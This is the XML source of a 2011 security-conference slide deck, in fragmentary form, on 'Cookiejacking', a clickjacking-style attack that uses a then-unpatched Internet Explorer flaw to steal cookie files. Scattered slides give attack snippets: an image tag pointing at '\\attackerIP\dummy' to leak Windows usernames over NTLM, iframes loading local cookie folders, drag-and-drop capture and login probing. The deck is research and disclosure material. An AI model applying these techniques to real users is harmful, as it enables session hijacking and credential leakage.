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AD1-C428-4CAD-9526-CF6F7EA6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074-9800-46B1-BF31-D2C32895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960-DF3A-488F-9AF9-966926C7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BA71-05DF-4C6B-90A2-8859B6EA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3AD-09AC-431B-849C-4A093E35F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131-AB4C-4B30-83FF-67126687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903-5AB9-4B9D-8428-2D988D48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11A7-C4E1-4865-9776-F1FA297E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38EB-F240-4A0B-93C8-E44A87974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3D7-A745-4C57-AA72-E9F5B0B7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9FA-15C6-48B6-8677-6EA52EFE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9A7-00D0-438D-ADB6-B4ABB262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7F5-771F-4FF9-B057-94811745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630-347A-4213-994C-4E60A644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4F9-4FD2-4F3B-BFF4-7B15DC0D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1674-562A-4CA6-B494-2BE95C11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8F1-C574-4F7E-95FF-07198E16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230-B73A-422B-90CF-4A0E2E3C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21E6-AF83-4680-B016-532BA1357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896-3792-4C32-95FE-F99BF250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E65-CB2D-446E-9860-0FEABEFB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511C-C790-4E57-99A4-5D2CA487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923-E4F8-4AE2-A113-6A8610B9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0C4-0C4D-4145-9F48-697D6B47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412-52AA-460B-AF18-E77D10F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A24-C406-459B-8C38-ADAF682D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CDC-CB91-4D20-88EC-04E09A9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354-C95A-43EC-9ABB-33023E68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FA0-CACE-4AA2-AC9D-EB94D54E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576-AB2E-4EC3-966C-01C4B2E0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D69-A416-4554-AE81-8401132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776E-0D14-4E97-97BE-E8C1583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65C-5F62-429C-8B5B-F60E982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80E-5AA9-4DEF-AE54-123190D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FE5-ADD7-4639-8723-236EC62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3C42-CB0C-44A2-8395-9DDB119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F6C7-AF1B-4630-A0CD-047C8CF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507B-FEDD-451A-AF96-88497AEA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FBF-9FF3-4F31-8B35-A82C0EE7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CD08-06D4-40C4-9A3D-9F13B2D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D31-A75C-4B8F-B316-442AD20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B35-82B6-47CA-AB1A-73E5251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4AF-D1CB-4AB5-B623-FB2556B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2D8-B267-4131-B069-AED57B7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370-E45E-4513-898B-D5676E6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DE6-FC1E-475E-B4D9-A05F2D4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6B6-E007-4A89-B692-AF29D32E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B146-8AA4-43B5-957A-4007C682DE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6491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Rosario Valotta  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 Cookie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7EC-1BBC-41D8-B8E7-9C38066831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hyperlink" Target="http://www.useragentman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-174240" y="1484280"/>
            <a:ext cx="411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lien League"/>
              </a:rPr>
              <a:t>Cookie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lien League"/>
              </a:rPr>
              <a:t>Rosario Val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14952"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="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6437160" y="1406520"/>
            <a:ext cx="2598840" cy="353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2">
            <a:alphaModFix amt="32000"/>
          </a:blip>
          <a:srcRect l="0" t="0" r="75087" b="78261"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3917880" y="1835280"/>
            <a:ext cx="64764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 Box 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581880" y="11174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7661160" y="4862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3"/>
          <a:srcRect l="33245" t="78153" r="41841" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3917880" y="3062160"/>
            <a:ext cx="647640" cy="7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16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3917880" y="1412640"/>
            <a:ext cx="2525760" cy="3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4565520" y="2125800"/>
            <a:ext cx="259236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4565520" y="1477440"/>
            <a:ext cx="2592360" cy="3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565520" y="3782880"/>
            <a:ext cx="3391200" cy="108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 flipV="1">
            <a:off x="3917880" y="3782520"/>
            <a:ext cx="338472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565520" y="306216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4000" y="-14760"/>
            <a:ext cx="54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dvanced Clickjacking: c</a:t>
            </a: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ntent ext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557520" y="1333440"/>
            <a:ext cx="2735280" cy="388800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ANd9GcR7kp4-_l0TPKU-Vwg3tscrVKB7gOVpkrtwSu0ea_iiOxhah5FGTnrOPrMP5w"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780000" y="1628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4997520" y="1549440"/>
            <a:ext cx="936720" cy="3313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541800" y="112536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start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arts to select content (e.g. text or html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end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ops selec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somewhere between A and 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drags the selected content into an attacker controlled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620640"/>
            <a:ext cx="63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technique is made up of 6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4716360" y="2708280"/>
            <a:ext cx="792360" cy="216000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 150840 w 792360"/>
              <a:gd name="textAreaRight" fmla="*/ 58932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4" hR="21600" stAng="10800000" swAng="5400000"/>
                <a:lnTo>
                  <a:pt x="11948" y="0"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-5400000" swAng="2231280"/>
                <a:lnTo>
                  <a:pt x="20726" y="11912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18310" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14146" y="11912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15574" y="11912"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-3168720" swAng="-1927823"/>
                <a:lnTo>
                  <a:pt x="10086" y="561"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-5703457" swAng="-5096543"/>
                <a:close/>
              </a:path>
              <a:path fill="darkenLess" w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="21600"/>
                </a:moveTo>
                <a:arcTo wR="8224" hR="21600" stAng="10800000" swAng="5400000"/>
                <a:lnTo>
                  <a:pt x="8224" y="0"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-5400000" swAng="303457"/>
                <a:lnTo>
                  <a:pt x="10086" y="561"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-5703457" swAng="-509654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4068720" y="2492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6469200" y="1450800"/>
            <a:ext cx="649080" cy="72108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7308720" y="4246560"/>
            <a:ext cx="648000" cy="64944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7451640" y="2637000"/>
            <a:ext cx="649440" cy="72072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7164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sight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loads cookie text file (0-day) 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ll image overlapped on the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ntent extraction techniqu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50560" y="-2700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ttacks mash-up: how the SOP was w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5"/>
          <a:srcRect l="2955" t="30833" r="87308" b="12462"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7236000" y="260280"/>
            <a:ext cx="1701720" cy="619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792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9399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3203640" y="1012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440000" y="17334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203640" y="242100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27640" y="41529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44355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49417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40240" y="52243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987640" y="306864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80000" y="2276640"/>
            <a:ext cx="5154480" cy="1584000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80808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708360" y="2421000"/>
            <a:ext cx="518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rag &amp; drop API doesn’t work well across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wo different dragging actions required in order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selec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drag&amp;drop it out of the i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quare721 BT"/>
              </a:rPr>
              <a:t>Drag &amp; drop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47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rag &amp; drop API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knowledged as one of the innovations introduced in HTML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ormally part of latest HTML5 draf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sed on Microsoft’s original implementation available on IE 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ully supported on IE 6,7,8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ustom implementation on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Square721 BT"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.useragentman.com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orks well on all IE versio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 effects: drag feedback image, cursor shape change, etc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Advanced content extraction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wo nested iframes defined in the attacker pag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frames sizes properly defined in order to ensure that scrolling is needed for the cookie (B content) to completely come into view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E.g. A.height=100; B.height=5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sequence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moves the mouse over the B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hen user clicks down the mouse button the “onfocus” event is trigger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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="it-IT" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Square721 BT"/>
              </a:rPr>
              <a:t>scrollspeed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 property of the iframe A is set to 1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th the mouse button down and the iframe B scrolling into iframe A, the final effect is that the user is selecting text as long as the mouse button is click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 the scrollspeed is big enough, a single click time is enough to select the whole cookie conten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First drag action (content selection) collapsed in a click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5435640" y="1125360"/>
            <a:ext cx="3527280" cy="2592360"/>
            <a:chOff x="5435640" y="1125360"/>
            <a:chExt cx="3527280" cy="2592360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5435640" y="1125360"/>
              <a:ext cx="352728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5722920" y="1557000"/>
              <a:ext cx="936000" cy="20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You must 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e ifr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o ens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at scr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is needed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mplete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elect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5578200" y="1412640"/>
              <a:ext cx="30970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7a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5722920" y="1569600"/>
              <a:ext cx="93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ok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5724360" y="155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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579600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37236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084720" y="126828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869800" y="4005360"/>
            <a:ext cx="2847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nfocus=“scrollspeed=10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V="1">
            <a:off x="7308720" y="1844640"/>
            <a:ext cx="792360" cy="2160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8497800" y="14144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8510760" y="17478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-2700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I know your (user)nam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Exploit a “feature” of IE (already discussed by Jorge Medina in 2010)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supports access to file system objects on SMB shares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s UNC (Universal Naming Convention) paths to reference them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an be used without restrictions inside web pages in the Internet zone or abov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19280" y="2565360"/>
            <a:ext cx="525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\\[WEB SERVER IP ADDRESS]\image.jp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4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6913440" y="3174840"/>
            <a:ext cx="1043280" cy="104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"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="647640" y="3141720"/>
            <a:ext cx="11160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252" name="AutoShape 43"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="250" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909440" y="3677760"/>
            <a:ext cx="500436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3" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620000" y="3387600"/>
            <a:ext cx="285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tri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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908000" y="4202280"/>
            <a:ext cx="5004720" cy="194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255" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3904560" y="3933720"/>
            <a:ext cx="2687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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908000" y="484956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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562760" y="4581360"/>
            <a:ext cx="3451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NTLM Challenge/Response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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908000" y="535428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9" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563480" y="5043600"/>
            <a:ext cx="5389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Windows Username, Windows Computer Name, Window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941720"/>
            <a:ext cx="1800360" cy="5050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6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7164360" y="544500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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7018200" y="5877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436572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11280" y="43920"/>
            <a:ext cx="62755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Little dirty secret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18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OS version can be retrieved through a little J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XP =   navigator.userAgent.indexOf("Windows NT 5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Vista= navigator.userAgent.indexOf("Windows NT 6.0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n7=  navigator.userAgent.indexOf("Windows NT 6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s the cookie valid?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e if the victim is logged on a given website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if a victim is logged using a “probing” approach (Jeremiah Grossman, 2006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ynamic attack setup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obing for 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Only define iframes to load valid cookies (1 iframe loads 1 cookie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4360" y="3645000"/>
            <a:ext cx="8208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https://mail.google.com/mail/pimages/2/labs/labs_bar_icon.png" onload=“doThis()" onerror=“doThat()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Ready to pown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16360" y="53038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16360" y="39639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987640" y="188424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93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458964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587520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5580000" y="622440"/>
            <a:ext cx="576360" cy="536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816360" y="12700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rcRect l="0" t="11991" r="5493" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580000" y="198900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324648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838680" y="262404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5580000" y="3325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5580000" y="465444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5580000" y="5950080"/>
            <a:ext cx="57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IE security zon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IE 0-da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Overview on UI redressing attack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lving the jigs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5" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2613000">
            <a:off x="2374560" y="3754440"/>
            <a:ext cx="57636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76720" y="58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00" name="Picture 10" descr="ie-girl"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="250920" y="981000"/>
            <a:ext cx="947520" cy="933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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654560" y="2349360"/>
            <a:ext cx="50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 page containing  &lt;img src=“\\attackerIP\dummy&gt; is serv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1708200" y="2771640"/>
            <a:ext cx="4952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’s browser requests img and send Windows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882800" y="5418000"/>
            <a:ext cx="379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 is cookiejacked and sends his cook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8028000" y="3348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0" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352520" y="2438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5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="15440" t="11890" r="23426" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7956720" y="981000"/>
            <a:ext cx="934920" cy="84456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308" name="Picture 36" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6875640" y="24130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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187280" y="291636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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295280" y="8366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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729480" y="284472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7812000" y="3780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User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AutoShape 42"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="308" idx="3"/>
            <a:endCxn id="304" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7450200" y="2700000"/>
            <a:ext cx="807120" cy="64836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14" name="AutoShape 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="305" idx="3"/>
            <a:endCxn id="308" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1909800" y="2700000"/>
            <a:ext cx="4966560" cy="180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pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Picture 44" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6877080" y="33321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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6730920" y="37638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Redir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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7451640" y="3564000"/>
            <a:ext cx="57636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48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1909800" y="3618720"/>
            <a:ext cx="4966560" cy="18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19" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1959840" y="3348000"/>
            <a:ext cx="456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Onerror event the browser is redirected to a perl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0" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403280" y="398448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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238400" y="4462560"/>
            <a:ext cx="957240" cy="3985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agPoc.html#user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52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="316" idx="2"/>
            <a:endCxn id="320" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4425120" y="1552680"/>
            <a:ext cx="246960" cy="51775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3" name="Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2019240" y="4365720"/>
            <a:ext cx="504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The script read the username sniffed and redirect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browser to the PoC page with the hash value set to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4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6950160" y="50133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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732720" y="5479920"/>
            <a:ext cx="93492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ollect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56"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="321" idx="2"/>
            <a:endCxn id="324" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="4116960" y="2468160"/>
            <a:ext cx="432360" cy="52333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42920" y="259920"/>
            <a:ext cx="47516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Square721 BT"/>
              </a:rPr>
              <a:t>The perfect PoC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appealing “content”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+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- willingly “interact” with her</a:t>
            </a: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86120" cy="702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21672" t="59450" r="21672" b="16908"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5651640" y="4508640"/>
            <a:ext cx="22320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ookiejacking: a new kind of UI redressing attack, exploiting a 0-day vulnerability in all versions of IE, all version of Windows box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Allows an attacker to steal session cookies, no XSS neede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Web site independent: it’s a browser fl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urrent countermeasures against Clickjacking don’t work with Cookiejacking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nk about using Flash…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It’s supposed to last for a long time: there is a huge installation base all over the worl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1908000" y="2133720"/>
            <a:ext cx="5410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 rot="388200">
            <a:off x="3924360" y="4869000"/>
            <a:ext cx="21715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ay time: IT professional, mobile TLC company, Rome, Ital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Night time: web security fan since 2007, released a bunch of advisories and PoCs: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duja Connection: first ever cross domain XSS worm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ritical Path Memova : 40 Millions users worldwide affected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MP: information gathering and intranet scanning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OWA: CSRF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log: http://sites.google.com/site/tentacoloviola/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543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verview on IE security zon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 IE, a web site is assigned to a security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ites in the same security zone behave the same way according to security privilege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5 default zon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Machine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Intra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s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ter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Restri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ity profiles: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 collection of security privileges that can be granted to each given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edefined: High, Medium, Medium-Low, Low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iz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Privileg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tiveX &amp; plugi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ownload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crip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094560" y="2169360"/>
            <a:ext cx="1297080" cy="64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492360" y="2276640"/>
            <a:ext cx="345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reasing security privi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43280" y="4941720"/>
            <a:ext cx="3652200" cy="1441440"/>
            <a:chOff x="4643280" y="4941720"/>
            <a:chExt cx="3652200" cy="1441440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="103" name="Picture 4" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId19"/>
            <a:srcRect l="0" t="0" r="2015" b="26121"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4643280" y="4941720"/>
              <a:ext cx="36003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1215600">
              <a:off x="7091280" y="5546160"/>
              <a:ext cx="1152360" cy="504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  <a:effectLst>
              <a:outerShdw dist="153753" dir="2700000" blurRad="0" rotWithShape="0">
                <a:srgbClr val="4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227640" y="5186160"/>
              <a:ext cx="2016000" cy="30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idden by defa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ANd9GcRGb_TvCq1ZSgruAER2T0lnq-i4oWLIqsJNqcVRC7kENVj_PZzh"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2482920" y="22892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62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y rule of thumb a web content belonging to a less privileged zone cannot access content belonging to more privileged zon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 it should be impossible for a web content to access local machine files. It should be.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71640" y="2362320"/>
            <a:ext cx="4927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=“file:///c:/test.txt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Nd9GcRxyDTYXZ_6OChNsdScn2qM41eendCrIoF2uNvV-OiIpbBPgSRp"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332000" y="27939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ANd9GcSVCoo69EwQD_l6GbXhhLNQETMwjLO6T3gjxqNl6Z_74h_Xspnf"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732720" y="2724120"/>
            <a:ext cx="966600" cy="966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2411280" y="3116160"/>
            <a:ext cx="4105440" cy="216000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 58824"/>
              <a:gd name="adj2" fmla="val 148446"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99cc00">
              <a:alpha val="23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659640" y="3619440"/>
            <a:ext cx="1616040" cy="307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Do not open that folder…aka IE 0-day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95280" y="83664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file:///C:/Documents and Settings/tentacoloViola/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ok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"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="0" t="0" r="73960" b="38263"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062760" y="1557360"/>
            <a:ext cx="30812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22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250920" y="1700280"/>
            <a:ext cx="57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ookies folder of the user currently log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ll kind of cook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HTT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e (HTTPS) cook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ny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orks on IE 6,7, 8 (also protected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ested on XP SP3, Vista,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f coordinated discosure and other oddities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January 28th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isclosed to MSRC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9 beta still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arch 14°: f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rst official release of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9 not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wo weeks ag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ew attack vector found, works also on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9640" y="400536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ile:/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9640" y="515772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“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http://192.168.1.2/redir.pl?url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:///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995640" y="4653000"/>
            <a:ext cx="792360" cy="431640"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 53102"/>
              <a:gd name="adj2" fmla="val 3970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44370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299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1718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763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237636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62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83664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35280" y="2635200"/>
            <a:ext cx="446580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document.getElementById(‘myId’).contentWindow.document.inne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172360" y="2635200"/>
            <a:ext cx="792360" cy="459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03640" y="44370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24000" y="155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700360" y="0"/>
            <a:ext cx="5986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Where do we go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573360"/>
            <a:ext cx="5154480" cy="64944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916280"/>
            <a:ext cx="518472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Same Origin Policy will block any program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access to a local iframe content from web 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2080" y="501336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220500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37814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987640" y="5157720"/>
            <a:ext cx="5112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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6443640" y="141084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5940360" y="2276640"/>
            <a:ext cx="3203640" cy="1008000"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 8929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732720" y="2460600"/>
            <a:ext cx="720720" cy="184320"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 77515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lickjacking aka UI Redressing attack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913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troduced by Jeremiah Grossman and Robert Hansen in 2008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t’s all about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s overlapp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SS opacity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692280"/>
            <a:ext cx="89647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6372360" y="2060640"/>
            <a:ext cx="1296720" cy="503280"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 87041"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80008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76400" y="17859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city=0; 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440400" y="292428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city=100; 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697800" y="2190600"/>
            <a:ext cx="647640" cy="216000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartSummingJunction">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80008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948360" y="1555920"/>
            <a:ext cx="358920" cy="574560"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14157"/>
              <a:gd name="adj2" fmla="val 1211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2060640"/>
            <a:ext cx="76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basic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properly positio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made in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clicks “hijack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User interaction is needed, SOP is not trigg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dvanced scenario: content extraction (Paul Sto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517800" y="12682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4581360"/>
            <a:ext cx="8913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ocial engineer a vic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elect content from a legitimate 3rd party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rag&amp;drop content in an attacker controlled e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teal sensitive HTML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inks  and Images are converted in U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76720" y="5635800"/>
            <a:ext cx="381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event.dataTransfer.getData(“Tex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dcterms:modified xsi:type="dcterms:W3CDTF">2011-05-14T22:38:09Z</dcterms:modified>
  <cp:revision>89</cp:revision>
  <dc:subject/>
  <dc:title>Diapositiva 1</dc:title>
</cp:coreProperties>
</file>